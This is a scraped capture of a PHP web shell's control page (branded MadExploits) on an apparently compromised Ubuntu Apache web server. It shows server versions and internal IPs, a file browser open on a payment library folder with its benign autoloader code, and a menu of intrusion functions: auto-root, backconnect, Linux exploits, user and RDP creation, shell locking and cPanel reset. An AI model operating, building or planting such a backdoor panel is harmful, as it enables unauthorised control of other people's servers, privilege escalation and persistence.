Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipdapplication /
old /
razorpay-php /
[ HOME SHELL ]
Name
Size
Permission
Action
libs
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
README.md
2.41
KB
-rw-r--r--
Razorpay.php
1.03
KB
-rw-r--r--
composer.json
1.05
KB
-rw-r--r--
composer.lock
3.84
KB
-rw-r--r--
doc.md
649
B
-rw-r--r--
version.txt
7
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Razorpay.php
<?php // Include Requests require_once __DIR__.'/libs/Requests-1.6.1/library/Requests.php'; // Register requests autoloader Requests::register_autoloader(); spl_autoload_register(function ($class) { // project-specific namespace prefix $prefix = 'Razorpay\Api'; // base directory for the namespace prefix $base_dir = __DIR__ . '/src/'; // does the class use the namespace prefix? $len = strlen($prefix); if (strncmp($prefix, $class, $len) !== 0) { // no, move to the next registered autoloader return; } // get the relative class name $relative_class = substr($class, $len); // // replace the namespace prefix with the base directory, // replace namespace separators with directory separators // in the relative class name, append with .php // $file = $base_dir . str_replace('\\', '/', $relative_class) . '.php'; // if the file exists, require it if (file_exists($file)) { require $file; } });
Close